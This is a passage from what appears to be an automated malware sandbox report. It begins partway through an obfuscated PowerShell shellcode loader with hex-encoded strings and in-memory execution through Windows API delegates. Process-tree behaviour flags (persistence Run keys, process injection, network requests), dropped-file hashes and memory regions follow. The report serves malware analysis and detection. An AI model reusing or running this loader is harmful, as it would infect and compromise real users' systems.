'F9DBCAF3D1DACBD2DBF6DFD0DAD2DB';$Adjunctly6=Betatesternes410 'ECEAEDCEDBDDD7DFD2F0DFD3DB929EF6D7DADBFCC7EDD7D9929EEECBDCD2D7DD';$Adjunctly7=Betatesternes410 'ECCBD0CAD7D3DB929EF3DFD0DFD9DBDA';$Adjunctly8=Betatesternes410 'ECDBD8D2DBDDCADBDAFADBD2DBD9DFCADB';$Adjunctly9=Betatesternes410 'F7D0F3DBD3D1CCC7F3D1DACBD2DB';$Forudindtaget0=Betatesternes410 'F3C7FADBD2DBD9DFCADBEAC7CEDB';$Forudindtaget1=Betatesternes410 'FDD2DFCDCD929EEECBDCD2D7DD929EEDDBDFD2DBDA929EFFD0CDD7FDD2DFCDCD929EFFCBCAD1FDD2DFCDCD';$Forudindtaget2=Betatesternes410 'F7D0C8D1D5DB';$Forudindtaget3=Betatesternes410 'EECBDCD2D7DD929EF6D7DADBFCC7EDD7D9929EF0DBC9EDD2D1CA929EE8D7CCCACBDFD2';$Forudindtaget4=Betatesternes410 'E8D7CCCACBDFD2FFD2D2D1DD';$Forudindtaget5=Betatesternes410 'D0CADAD2D2';$Forudindtaget6=Betatesternes410 'F0CAEECCD1CADBDDCAE8D7CCCACBDFD2F3DBD3D1CCC7';$Forudindtaget7=Betatesternes410 'F7FBE6';$Forudindtaget8=Betatesternes410 'E2';$Overchannel=Betatesternes410 'EBEDFBEC8D8C';$Sovseskeen=Betatesternes410 'FDDFD2D2E9D7D0DAD1C9EECCD1DDFF';function fkp {Param ($Skolemestererer68, $Skiderik) ;$Judicative0 =Betatesternes410 '9AF7DACCD7D8CACDCACADBD2CDDBD08F878A9E839E96E5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090F9DBCAFFCDCDDBD3DCD2D7DBCD96979EC29EE9D6DBCCDB93F1DCD4DBDDCA9EC59E9AE190F9D2D1DCDFD2FFCDCDDBD3DCD2C7FDDFDDD6DB9E93FFD0DA9E9AE190F2D1DDDFCAD7D1D090EDCED2D7CA969AF8D1CCCBDAD7D0DACADFD9DBCA8697E5938FE390FBCFCBDFD2CD969AFFDAD4CBD0DDCAD2C78E979EC39790F9DBCAEAC7CEDB969AFFDAD4CBD0DDCAD2C78F97';&($Forudindtaget7) $Judicative0;$Judicative5 = Betatesternes410 '9AFDD1D0CADFD7D0DBCCD6DFC8D0DB9E839E9AF7DACCD7D8CACDCACADBD2CDDBD08F878A90F9DBCAF3DBCAD6D1DA969AFFDAD4CBD0DDCAD2C78C929EE5EAC7CEDBE5E3E39EFE969AFFDAD4CBD0DDCAD2C78D929E9AFFDAD4CBD0DDCAD2C78A9797';&($Forudindtaget7) $Judicative5;$Judicative1 = Betatesternes410 'CCDBCACBCCD09E9AFDD1D0CADFD7D0DBCCD6DFC8D0DB90F7D0C8D1D5DB969AD0CBD2D2929EFE96E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8E396F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD89696F0DBC993F1DCD4DBDDCA9EF7D0CAEECACC97929E969AF7DACCD7D8CACDCACADBD2CDDBD08F878A90F9DBCAF3DBCAD6D1DA969AFFDAD4CBD0DDCAD2C78B979790F7D0C8D1D5DB969AD0CBD2D2929EFE969AEDD5D1D2DBD3DBCDCADBCCDBCCDBCC888697979797929E9AEDD5D7DADBCCD7D59797';&($Forudindtaget7) $Judicative1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Unprincipledly18,[Parameter(Position = 1)] [Type] $Alfarytme = [Void]);$Judicative2 = Betatesternes410 '9AD0CBD1C8D19E839EE5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090FADBD8D7D0DBFAC7D0DFD3D7DDFFCDCDDBD3DCD2C79696F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FFCDCDDBD3DCD2C7F0DFD3DB969AFFDAD4CBD0DDCAD2C7869797929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FBD3D7CA90FFCDCDDBD3DCD2C7FCCBD7D2DADBCCFFDDDDDBCDCDE38484ECCBD09790FADBD8D7D0DBFAC7D0DFD3D7DDF3D1DACBD2DB969AFFDAD4CBD0DDCAD2C787929E9AD8DFD2CDDB9790FADBD8D7D0DBEAC7CEDB969AF8D1CCCBDAD7D0DACADFD9DBCA8E929E9AF8D1CCCBDAD7D0DACADFD9DBCA8F929EE5EDC7CDCADBD390F3CBD2CAD7DDDFCDCAFADBD2DBD9DFCADBE397';&($Forudindtaget7) $Judicative2;$Judicative3 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBFDD1D0CDCACCCBDDCAD1CC969AFFDAD4CBD0DDCAD2C788929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FDDFD2D2D7D0D9FDD1D0C8DBD0CAD7D1D0CDE38484EDCADFD0DADFCCDA929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative3;$Judicative4 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBF3DBCAD6D1DA969AF8D1CCCBDAD7D0DACADFD9DBCA8C929E9AF8D1CCCBDAD7D0DACADFD9DBCA8D929E9AFFD2D8DFCCC7CAD3DB929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative4;$Judicative5 = Betatesternes410 'CCDBCACBCCD09E9AD0CBD1C8D190FDCCDBDFCADBEAC7CEDB9697';&($Forudindtaget7) $Judicative5 ;}$Biografierne = Betatesternes410 'D5DBCCD0DBD28D8C';$Judicative6 = Betatesternes410 '9AEECBD3CEDBCCD0DBCD9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AFCD7D1D9CCDFD8D7DBCCD0DB9E9AF8D1CCCBDAD7D0DACADFD9DBCA8A97929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Judicative6;$Josina = fkp $Forudindtaget5 $Forudindtaget6;$Judicative7 = Betatesternes410 '9AFCDBCDD5CCD7D0D9DBCC8D9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E888B8E929E8EC68D8E8E8E929E8EC68A8E97';&($Forudindtaget7) $Judicative7;$Judicative8 = Betatesternes410 '9AFFCBCCDBD0DB9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E878D888D86888B88929E8EC68D8E8E8E929E8EC68A97';&($Forudindtaget7) $Judicative8;$Beskringer00='HKCU:\ahorntrerne\Soldebror';$Beskringer01 =Betatesternes410 '9AFFD2CBD3D0DBCCCD8396F9DBCA93F7CADBD3EECCD1CEDBCCCAC79E93EEDFCAD69E9AFCDBCDD5CCD7D0D9DBCC8E8E9790DBC6CACCDFCED1D2DFCADB';&($Forudindtaget7) $Beskringer01;$Judicative9 = Betatesternes410 '9AF4CBDAD7DDDFCAD7C8DB9E839EE5EDC7CDCADBD390FDD1D0C8DBCCCAE38484F8CCD1D3FCDFCDDB888AEDCACCD7D0D9969AFFD2CBD3D0DBCCCD97';&($Forudindtaget7) $Judicative9;$Alumners0 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E8E929E9E9AFCDBCDD5CCD7D0D9DBCC8D929E888B8E97';&($Forudindtaget7) $Alumners0;$Omtumlet=$Judicative.count-650;$Alumners1 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E888B8E929E9AFFCBCCDBD0DB929E9AF1D3CACBD3D2DBCA97';&($Forudindtaget7) $Alumners1;$Alumners2 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AF1C8DBCCDDD6DFD0D0DBD29E9AEDD1C8CDDBCDD5DBDBD097929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Alumners2;$Alumners3 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC90F7D0C8D1D5DB969AFCDBCDD5CCD7D0D9DBCC8D929AFFCBCCDBD0DB929AF4D1CDD7D0DF928E928E97';&($Forudindtaget7) $Alumners3#"
          4⤵
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:836
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            5⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Adds policy Run key to start application
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
          PID:988

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            61KB

            MD5

            e71c8443ae0bc2e282c73faead0a6dd3

            SHA1

            0c110c1b01e68edfacaeae64781a37b1995fa94b

            SHA256

            95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

            SHA512

            b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            5b1e521a9838e012df009e51fa1ac60b

            SHA1

            94a27c491edb06c910c9d7a9d6288d7f1767e78e

            SHA256

            e6745b945cb1c1ff3a5f7b4b6c70f12bf5eb9ffc733d44ffb1f8c7561bf3098f

            SHA512

            ce80df269aece40aadb41032434fb8c21c6b8fc0ae170d13feb9e5d53fd861e499d6e8f1a5708a206c84506e01e4518d7a3819f79d451d15b1ffbec3bba0567c

          • C:\Users\Admin\AppData\Local\Temp\Cab38FC.tmp

            Filesize

            61KB

            MD5

            e71c8443ae0bc2e282c73faead0a6dd3

            SHA1

            0c110c1b01e68edfacaeae64781a37b1995fa94b

            SHA256

            95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

            SHA512

            b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

          • C:\Users\Admin\AppData\Local\Temp\k4qt1d.zip

            Filesize

            444KB

            MD5

            d71848944418c67f6eb230682f9a969a

            SHA1

            11d37a0eccbaf9995c6b236ff1a99d174a2566bd

            SHA256

            efff0464180fcb34ec33e7835086ea58adc84bc3f0b08a7323ef1d58b258e59e

            SHA512

            7baef376fb5f87e43124f79f81fe45567b7926be277a05abbbfe74bdbbe8dc49c238999e432fb4c457dff23ca78915d2a899bdde9a2ee79b77c655c17ebe706d

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TXZV7S6ZQM7CK5FAZ0M5.temp

            Filesize

            7KB

            MD5

            f815cae08d83ae982d0fef8887550029

            SHA1

            4b06ccc65130f5140525dc6b99f1986292a850ef

            SHA256

            e36036835807757aad8018868f4ae8f08eddc483a04c8eab330e1d1c50c2dc79

            SHA512

            10d6de33aa2bf6564b95b056026af71873ba289b10b22b6eb2451185a14ba8e467c624908100992575ca263c945d2e2725c3d7a72e11617329604b80fe0c1acd

          • \Users\Admin\AppData\Local\Temp\sqlite3.dll

            Filesize

            849KB

            MD5

            87f9e5a6318ac1ec5ee05aa94a919d7a

            SHA1

            7a9956e8de89603dba99772da29493d3fd0fe37d

            SHA256

            7705b87603e0d772e1753441001fcf1ac2643ee41bf14a8177de2c056628665c

            SHA512

            c45c03176142918e34f746711e83384572bd6a8ed0a005600aa4a18cf22eade06c76eda190b37db49ec1971c4649e086affd19eee108c5f405df27c0c8cb23d2

          • memory/524-79-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-78-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-77-0x00000000022F0000-0x00000000022F8000-memory.dmp

            Filesize

            32KB

          • memory/524-76-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

            Filesize

            2.9MB

          • memory/524-75-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-87-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-88-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-89-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/524-90-0x00000000028A0000-0x0000000002920000-memory.dmp

            Filesize

            512KB

          • memory/836-86-0x00000000026F0000-0x00000000026F1000-memory.dmp

            Filesize

            4KB

          • memory/836-93-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/836-82-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/836-91-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/836-85-0x0000000005C20000-0x000000000B56D000-memory.dmp

            Filesize

            89.3MB

          • memory/836-84-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/836-83-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/836-92-0x0000000002750000-0x0000000002790000-memory.dmp

            Filesize

            256KB

          • memory/1204-128-0x0000000003FB0000-0x00000000040A6000-memory.dmp

            Filesize

            984KB

          • memory/1204-183-0x00000000063A0000-0x0000000006452000-memory.dmp

            Filesize

            712KB

          • memory/1204-140-0x00000000063A0000-0x0000000006452000-memory.dmp

            Filesize

            712KB

          • memory/1540-135-0x0000000000090000-0x00000000000BD000-memory.dmp

            Filesize

            180KB

          • memory/1540-136-0x0000000000090000-0x00000000000BD000-memory.dmp

            Filesize

            180KB

          • memory/1540-185-0x0000000061E00000-0x0000000061EC1000-memory.dmp

            Filesize

            772KB

          • memory/1540-141-0x0000000001E90000-0x0000000001F1F000-memory.dmp

            Filesize

            572KB

          • memory/1540-130-0x0000000000220000-0x0000000000234000-memory.dmp

            Filesize

            80KB

          • memory/1540-131-0x0000000000220000-0x0000000000234000-memory.dmp

            Filesize

            80KB

          • memory/1540-137-0x0000000002290000-0x0000000002593000-memory.dmp

            Filesize

            3.0MB

          • memory/1540-134-0x0000000000220000-0x0000000000234000-memory.dmp

            Filesize

            80KB

          • memory/1728-123-0x0000000000400000-0x0000000000615000-memory.dmp

            Filesize

            2.1MB

          • memory/1728-126-0x00000000220E0000-0x00000000223E3000-memory.dmp

            Filesize

            3.0MB

          • memory/1728-129-0x0000000001130000-0x0000000006A7D000-memory.dmp

            Filesize

            89.3MB

          • memory/1728-122-0x0000000001130000-0x0000000006A7D000-memory.dmp

            Filesize

            89.3MB

          • memory/1728-125-0x0000000000400000-0x0000000000615000-memory.dmp

            Filesize

            2.1MB

          • memory/1728-121-0x0000000000400000-0x0000000000615000-memory.dmp

            Filesize

            2.1MB

          • memory/1728-97-0x0000000000400000-0x0000000000615000-memory.dmp

            Filesize

            2.1MB

          • memory/1728-94-0x0000000001130000-0x0000000006A7D000-memory.dmp

            Filesize

            89.3MB

          • memory/1728-127-0x00000000001E0000-0x00000000001F0000-memory.dmp

            Filesize

            64KB